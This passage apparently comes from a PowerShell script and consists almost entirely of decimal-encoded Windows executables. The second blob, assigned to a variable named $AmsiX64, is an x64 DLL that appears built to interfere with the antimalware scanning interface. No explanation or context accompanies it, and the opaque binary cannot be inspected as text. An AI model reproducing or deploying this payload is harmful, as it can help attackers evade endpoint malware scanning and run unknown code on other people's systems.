0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 12 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 80 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 
115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 12 1 0 0 7 48 108 48 155 48 171 48 194 48 211 48 228 48 233 48 2 49 7 49 20 49 97 49 126 49 136 49 150 49 168 49 189 49 251 49 212 50 7 51 85 51 94 51 105 51 112 51 144 51 150 51 156 51 162 51 168 51 174 51 181 51 188 51 195 51 202 51 209 51 216 51 223 51 231 51 239 51 247 51 3 52 12 52 17 52 23 52 33 52 43 52 59 52 75 52 91 52 100 52 201 52 121 53 170 53 249 53 12 54 31 54 43 54 59 54 76 54 114 54 135 54 142 54 148 54 166 54 176 54 17 55 30 55 69 55 77 55 102 55 160 55 187 55 199 55 214 55 223 55 236 55 27 56 35 56 46 56 52 56 58 56 70 56 76 56 111 56 160 56 75 57 106 57 116 57 133 57 146 57 151 57 189 57 194 57 231 57 241 57 14 58 91 58 96 58 115 58 129 58 156 58 167 58 54 59 63 59 71 59 142 59 157 59 164 59 218 59 227 59 240 59 251 59 4 60 19 60 30 60 36 60 42 60 48 60 54 60 60 60 66 60 72 60 78 60 84 60 90 60 96 60 102 60 108 60 114 60 0 0 0 32 0 0 32 0 0 0 112 48 164 48 168 48 92 49 96 49 104 49 48 52 80 52 108 52 112 52 140 52 144 52 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + $AmsiX64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 14 31 186 14 
0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 148 172 98 253 208 205 12 174 208 205 12 174 208 205 12 174 217 181 159 174 210 205 12 174 190 150 13 175 211 205 12 174 190 150 15 175 210 205 12 174 190 150 9 175 216 205 12 174 190 150 8 175 217 205 12 174 13 50 199 174 210 205 12 174 208 205 13 174 240 205 12 174 2 150 4 175 209 205 12 174 2 150 243 174 209 205 12 174 2 150 14 175 209 205 12 174 82 105 99 104 208 205 12 174 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 7 0 136 29 62 87 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 16 0 0 0 28 0 0 0 0 0 0 160 19 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 128 0 0 0 4 0 0 0 0 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 108 38 0 0 80 0 0 0 0 96 0 0 224 1 0 0 0 64 0 0 176 1 0 0 0 0 0 0 0 0 0 0 0 112 0 0 24 0 0 0 112 33 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 33 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 248 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 211 14 0 0 0 16 0 0 0 16 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 128 10 0 0 0 32 0 0 0 12 0 0 0 20 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 64 6 0 0 0 48 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 112 100 97 116 97 0 0 176 1 0 0 0 64 0 0 0 2 0 0 0 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 103 102 105 100 115 0 0 16 0 0 0 0 80 0 0 0 2 0 0 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 96 0 0 0 2 0 0 0 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 24 0 0 0 0 112 0 0 0 2 0 0 0 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 195 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 72 59 13 217 31 0 0 242 117 18 72 193 193 16 102 247 193 255 255 242 117 2 242 195 72 193 201 16 233 211 3 0 0 204 204 204 72 131 236 40 133 210 116 57 131 234 1 116 40 131 234 1 116 22 131 250 1 116 10 184 1 0 0 0 72 131 196 40 195 232 142 5 0 0 235 5 232 95 5 0 0 15 182 192 72 131 196 40 195 73 139 208 72 131 196 40 233 15 0 0 0 77 133 192 15 149 193 72 131 196 40 233 44 1 0 0 72 137 92 36 8 72 137 116 36 16 72 137 124 36 32 65 86 72 131 236 32 72 139 242 76 139 241 51 201 232 2 6 0 0 132 192 117 7 51 192 233 232 0 0 0 232 150 4 0 0 138 216 136 68 36 64 64 183 1 131 61 234 36 0 0 0 116 10 185 7 0 0 0 232 62 9 0 0 199 5 212 36 0 0 1 0 0 0 232 199 4 0 0 132 192 116 103 232 110 10 0 0 72 141 13 179 10 0 0 232 6 8 0 0 232 197 8 0 0 72 141 13 206 8 0 0 232 245 7 0 0 232 224 8 0 0 72 141 21 253 15 0 0 72 141 13 238 15 0 0 232 213 12 0 0 133 192 117 41 232 96 4 0 0 132 192 116 32 72 141 21 205 15 0 0 72 141 13 190 15 0 0 232 175 12 0 0 199 5 103 36 0 0 2 0 0 0 64 50 255 138 203 232 9 7 0 0 64 132 255 15 133 78 255 255 255 232 167 8 0 0 72 139 216 72 131 56 0 116 36 72 139 200 232 78 6 0 0 132 192 116 24 72 139 27 72 139 203 232 111 10 0 0 76 139 198 186 2 0 0 0 73 139 206 255 211 255 5 156 30 0 0 184 1 0 0 0 72 139 92 36 48 72 139 116 36 56 72 139 124 36 72 72 131 196 32 65 94 195 204 72 137 92 36 8 72 137 116 36 24 87 72 131 236 32 64 138 241 139 5 104 30 0 0 51 219 133 192 127 4 51 192 235 80 255 200 137 5 86 30 0 0 232 109 3 0 0 64 138 248 136 68 36 56 131 61 195 35 0 0 2 116 10 185 7 0 0 0 232 23 8 0 0 232 102 4 0 0 137 29 172 35 
0 0 232 139 4 0 0 64 138 207 232 75 6 0 0 51 210 64 138 206 232 101 6 0 0 132 192 15 149 195 139 195 72 139 92 36 48 72 139 116 36 64 72 131 196 32 95 195 204 204 72 139 196 72 137 88 32 76 137 64 24 137 80 16 72 137 72 8 86 87 65 86 72 131 236 64 77 139 240 139 250 72 139 241 141 66 255 131 248 1 119 46 232 217 0 0 0 139 216 137 68 36 48 133 192 15 132 179 0 0 0 77 139 198 139 215 72 139 206 232 182 253 255 255 139 216 137 68 36 48 133 192 15 132 152 0 0 0 131 255 1 117 8 72 139 206 232 55 11 0 0 77 139 198 139 215 72 139 206 232 74 253 255 255 139 216 137 68 36 48 131 255 1 117 52 133 192 117 39 77 139 198 51 210 72 139 206 232 46 253 255 255 77 139 198 51 210 72 139 206 232 101 253 255 255 77 139 198 51 210 72 139 206 232 96 0 0 0 131 255 1 117 4 133 219 116 4 133 255 117 12 72 139 206 232 229 10 0 0 133 255 116 5 131 255 3 117 42 77 139 198 139 215 72 139 206 232 45 253 255 255 139 216 137 68 36 48 133 192 116 19 77 139 198 139 215 72 139 206 232 30 0 0 0 139 216 137 68 36 48 235 6 51 219 137 92 36 48 139 195 72 139 92 36 120 72 131 196 64 65 94 95 94 195 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 72 139 29 233 13 0 0 73 139 248 139 242 72 139 233 72 133 219 117 5 141 67 1 235 18 72 139 203 232 127 8 0 0 76 139 199 139 214 72 139 205 255 211 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 195 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 73 139 248 139 218 72 139 241 131 250 1 117 5 232 99 5 0 0 76 139 199 139 211 72 139 206 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 233 103 254 255 255 204 204 204 64 83 72 131 236 32 72 139 217 51 201 255 21 119 12 0 0 72 139 203 255 21 6 12 0 0 255 21 32 12 0 0 72 139 200 186 9 4 0 192 72 131 196 32 91 72 255 37 76 12 0 0 72 137 76 36 8 72 131 236 56 185 23 0 0 0 232 13 10 0 0 133 192 116 7 185 2 0 0 0 205 41 72 141 13 183 28 0 0 232 170 0 0 0 72 139 68 36 56 72 137 5 158 29 0 0 72 141 68 36 56 72 131 192 8 72 137 5 46 29 0 0 72 139 5 135 29 0 0 72 137 5 248 27 0 0 72 139 68 
36 64 72 137 5 252 28 0 0 199 5 210 27 0 0 9 4 0 192 199 5 204 27 0 0 1 0 0 0 199 5 214 27 0 0 1 0 0 0 184 8 0 0 0 72 107 192 0 72 141 13 206 27 0 0 72 199 4 1 2 0 0 0 184 8 0 0 0 72 107 192 0 72 139 13 70 27 0 0 72 137 76 4 32 184 8 0 0 0 72 107 192 1 72 139 13 57 27 0 0 72 137 76 4 32 72 141 13 125 12 0 0 232 0 255 255 255 72 131 196 56 195 204 204 204 64 83 86 87 72 131 236 64 72 139 217 255 21 31 11 0 0 72 139 179 248 0 0 0 51 255 69 51 192 72 141 84 36 96 72 139 206 255 21 253 10 0 0 72 133 192 116 57 72 131 100 36 56 0 72 141 76 36 104 72 139 84 36 96 76 139 200 72 137 76 36 48 76 139 198 72 141 76 36 112 72 137 76 36 40 51 201 72 137 92 36 32 255 21 190 10 0 0 255 199 131 255 2 124 177 72 131 196 64 95 94 91 195 204 204 204 72 131 236 40 232 103 8 0 0 133 192 116 33 101 72 139 4 37 48 0 0 0 72 139 72 8 235 5 72 59 200 116 20 51 192 240 72 15 177 13 64 32 0 0 117 238 50 192 72 131 196 40 195 176 1 235 247 204 204 204 72 131 236 40 232 43 8 0 0 133 192 116 7 232 94 6 0 0 235 5 232 95 8 0 0 176 1 72 131 196 40 195 72 131 236 40 51 201 232 65 1 0 0 132 192 15 149 192 72 131 196 40 195 204 204 204 72 131 236 40 232 99 8 0 0 132 192 117 4 50 192 235 18 232 86 8 0 0 132 192 117 7 232 77 8 0 0 235 236 176 1 72 131 196 40 195 72 131 236 40 232 59 8 0 0 232 54 8 0 0 176 1 72 131 196 40 195 204 204 204 72 137 92 36 8 72 137 108 36 16 72 137 116 36 24 87 72 131 236 32 73 139 249 73 139 240 139 218 72 139 233 232 152 7 0 0 133 192 117 23 131 251 1 117 18 72 139 207 232 187 5 0 0 76 139 198 51 210 72 139 205 255 215 72 139 84 36 88 139 76 36 80 72 139 92 36 48 72 139 108 36 56 72 139 116 36 64 72 131 196 32 95 233 153 7 0 0 204 204 204 72 131 236 40 232 79 7 0 0 133 192 116 16 72 141 13 72 31 0 0 72 131 196 40 233 145 7 0 0 232 106 249 255 255 133 192 117 5 232 143 7 0 0 72 131 196 40 195 72 131 236 40 51 201 232 141 7 0 0 72 131 196 40 233 132 7 0 0 64 83 72 131 236 32 15 182 5 59 31 0 0 133 201 187 1 0 0 0 15 68 195 136 5 43 31 0 0 232 46 5 0 0 232 93 7 0 0 132 192 117 
4 50 192 235 20 232 80 7 0 0 132 192 117 9 51 201 232 69 7 0 0 235 234 138 195 72 131 196 32 91 195 204 204 204 72 137 92 36 8 85 72 139 236 72 131 236 64 139 217 131 249 1 15 135 166 0 0 0 232 171 6 0 0 133 192 116 43 133 219 117 39 72 141 13 160 30 0 0 232 225 6 0 0 133 192 116 4 50 192 235 122 72 141 13 164 30 0 0 232 205 6 0 0 133 192 15 148 192 235 103 72 139 21 169 24 0 0 73 131 200 255 139 194 185 64 0 0 0 131 224 63 43 200 176 1 73 211 200 76 51 194 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 16 77 240 15 17 5 69 30 0 0 76 137 69 224 76 137 69 232 15 16 69 224 76 137 69 240 242 15 17 13 61 30 0 0 242 15 16 77 240 15 17 5 57 30 0 0 242 15 17 13 65 30 0 0 72 139 92 36 80 72 131 196 64 93 195 185 5 0 0 0 232 84 2 0 0 204 204 204 204 72 131 236 24 76 139 193 184 77 90 0 0 102 57 5 29 232 255 255 117 124 72 99 5 80 232 255 255 72 141 21 13 232 255 255 72 141 12 16 129 57 80 69 0 0 117 98 184 11 2 0 0 102 57 65 24 117 87 76 43 194 15 183 65 20 72 141 81 24 72 3 208 15 183 65 6 72 141 12 128 76 141 12 202 72 137 20 36 73 59 209 116 24 139 74 12 76 59 193 114 10 139 66 8 3 193 76 59 192 114 8 72 131 194 40 235 223 51 210 72 133 210 117 4 50 192 235 23 247 66 36 0 0 0 128 116 4 50 192 235 10 176 1 235 6 50 192 235 2 50 192 72 131 196 24 195 64 83 72 131 236 32 138 217 232 83 5 0 0 51 210 133 192 116 11 132 219 117 7 72 135 21 62 29 0 0 72 131 196 32 91 195 64 83 72 131 236 32 128 61 99 29 0 0 0 138 217 116 4 132 210 117 14 138 203 232 144 5 0 0 138 203 232 137 5 0 0 176 1 72 131 196 32 91 195 204 64 83 72 131 236 32 72 139 21 55 23 0 0 72 139 217 139 202 72 51 21 251 28 0 0 131 225 63 72 211 202 72 131 250 255 117 10 72 139 203 232 63 5 0 0 235 15 72 139 211 72 141 13 219 28 0 0 232 34 5 0 0 51 201 133 192 72 15 68 203 72 139 193 72 131 196 32 91 195 204 72 131 236 40 232 167 255 255 255 72 247 216 27 192 247 216 255 200 72 131 196 40 195 204 72 137 92 36 32 85 72 139 236 72 131 236 32 72 131 101 24 0 72 187 50 162 223 45 153 43 0 0 72 139 5 185 22 
0 0 72 59 195 117 111 72 141 77 24 255 21 226 6 0 0 72 139 69 24 72 137 69 16 255 21 220 6 0 0 139 192 72 49 69 16 255 21 216 6 0 0 139 192 72 141 77 32 72 49 69 16 255 21 208 6 0 0 139 69 32 72 141 77 16 72 193 224 32 72 51 69 32 72 51 69 16 72 51 193 72 185 255 255 255 255 255 255 0 0 72 35 193 72 185 51 162 223 45 153 43 0 0 72 59 195 72 15 68 193 72 137 5 69 22 0 0 72 139 92 36 72 72 247 208 72 137 5 62 22 0 0 72 131 196 32 93 195 72 141 13 57 28 0 0 72 255 37 82 6 0 0 204 204 72 141 13 41 28 0 0 233 6 4 0 0 72 141 5 45 28 0 0 195 72 141 5 45 28 0 0 195 72 131 236 40 232 231 255 255 255 72 131 8 4 232 230 255 255 255 72 131 8 2 72 131 196 40 195 204 72 141 5 25 28 0 0 195 72 137 92 36 8 85 72 141 172 36 64 251 255 255 72 129 236 192 5 0 0 139 217 185 23 0 0 0 232 243 3 0 0 133 192 116 4 139 203 205 41 131 37 224 27 0 0 0 72 141 77 240 51 210 65 184 208 4 0 0 232 151 3 0 0 72 141 77 240 255 21 173 5 0 0 72 139 157 232 0 0 0 72 141 149 216 4 0 0 72 139 203 69 51 192 255 21 139 5 0 0 72 133 192 116 60 72 131 100 36 56 0 72 141 141 224 4 0 0 72 139 149 216 4 0 0 76 139 200 72 137 76 36 48 76 139 195 72 141 141 232 4 0 0 72 137 76 36 40 72 141 77 240 72 137 76 36 32 51 201 255 21 66 5 0 0 72 139 133 200 4 0 0 72 141 76 36 80 72 137 133 232 0 0 0 51 210 72 141 133 200 4 0 0 65 184 152 0 0 0 72 131 192 8 72 137 133 136 0 0 0 232 0 3 0 0 72 139 133 200 4 0 0 72 137 68 36 96 199 68 36 80 21 0 0 64 199 68 36 84 1 0 0 0 255 21 14 5 0 0 131 248 1 72 141 68 36 80 72 137 68 36 64 72 141 69 240 15 148 195 72 137 68 36 72 51 201 255 21 45 5 0 0 72 141 76 36 64 255 21 186 4 0 0 133 192 117 10 246 219 27 192 33 5 220 26 0 0 72 139 156 36 208 5 0 0 72 129 196 192 5 0 0 93 195 204 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 32 72 141 29 154 9 0 0 72 141 53 147 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 105 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 137 92 36 8 72 137 116 36 16 87 72 131 236 
32 72 141 29 94 9 0 0 72 141 53 87 9 0 0 235 22 72 139 59 72 133 255 116 10 72 139 207 232 29 0 0 0 255 215 72 131 195 8 72 59 222 114 229 72 139 92 36 48 72 139 116 36 56 72 131 196 32 95 195 204 204 72 255 37 241 4 0 0 204 72 137 92 36 16 85 72 139 236 72 131 236 32 131 101 232 0 51 201 51 192 199 5 245 19 0 0 2 0 0 0 15 162 68 139 193 199 5 226 19 0 0 1 0 0 0 65 129 240 110 116 101 108 68 139 202 65 129 241 105 110 101 73 68 139 210 69 11 200 139 211 129 242 71 101 110 117 68 139 216 68 11 202 184 1 0 0 0 65 15 148 192 129 241 99 65 77 68 129 243 65 117 116 104 65 129 242 101 110 116 105 65 11 218 11 217 65 15 148 194 51 201 15 162 68 139 201 137 69 240 69 132 192 68 137 77 248 68 139 5 156 25 0 0 139 200 137 93 244 137 85 252 116 82 72 131 13 118 19 0 0 255 65 131 200 4 37 240 63 255 15 68 137 5 122 25 0 0 61 192 6 1 0 116 40 61 96 6 2 0 116 33 61 112 6 2 0 116 26 5 176 249 252 255 131 248 32 119 27 72 187 1 0 1 0 1 0 0 0 72 15 163 195 115 11 65 131 200 1 68 137 5 64 25 0 0 69 132 210 116 25 129 225 0 15 240 15 129 249 0 15 96 0 124 11 65 131 200 4 68 137 5 34 25 0 0 184 7 0 0 0 137 85 224 68 137 77 228 68 59 216 124 36 51 201 15 162 137 69 240 137 93 244 137 77 248 137 85 252 137 93 232 15 186 227 9 115 11 65 131 200 2 68 137 5 237 24 0 0 65 15 186 225 20 115 110 199 5 192 18 0 0 2 0 0 0 199 5 186 18 0 0 6 0 0 0 65 15 186 225 27 115 83 65 15 186 225 28 115 76 51 201 15 1 208 72 193 226 32 72 11 208 72 137 85 16 72 139 69 16 36 6 60 6 117 50 139 5 140 18 0 0 131 200 8 199 5 123 18 0 0 3 0 0 0 246 69 232 32 137 5 117 18 0 0 116 19 131 200 32 199 5 98 18 0 0 5 0 0 0 137 5 96 18 0 0 51 192 72 139 92 36 56 72 131 196 32 93 195 204 204 204 51 192 57 5 92 18 0 0 15 149 192 195 194 0 0 204 204 204 204 204 255 37 178 2 0 0 255 37 164 2 0 0 255 37 150 2 0 0 255 37 136 2 0 0 255 37 122 2 0 0 255 37 228 2 0 0 255 37 214 2 0 0 255 37 200 2 0 0 255 37 186 2 0 0 255 37 172 2 0 0 255 37 158 2 0 0 255 37 144 2 0 0 255 37 130 2 0 0 255 37 116 2 0 0 255 37 30 2 0 0 204 204 176 1 
195 204 204 204 204 204 204 204 102 102 15 31 132 0 0 0 0 0 255 224 64 85 72 131 236 32 72 139 234 138 77 64 72 131 196 32 93 233 4 250 255 255 204 64 85 72 131 236 32 72 139 234 232 45 248 255 255 138 77 56 72 131 196 32 93 233 232 249 255 255 204 64 85 72 131 236 48 72 139 234 72 139 1 139 16 72 137 76 36 40 137 84 36 32 76 141 13 161 241 255 255 76 139 69 112 139 85 104 72 139 77 96 232 93 247 255 255 144 72 131 196 48 93 195 204 64 85 72 139 234 72 139 1 51 201 129 56 5 0 0 192 15 148 193 139 193 93 195 204 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 216 29 0 128 1 0 0 0 80 30 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 48 0 128 1 0 0 0 240 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 136 29 62 87 0 0 0 0 2 0 0 0 65 0 0 0 116 34 0 
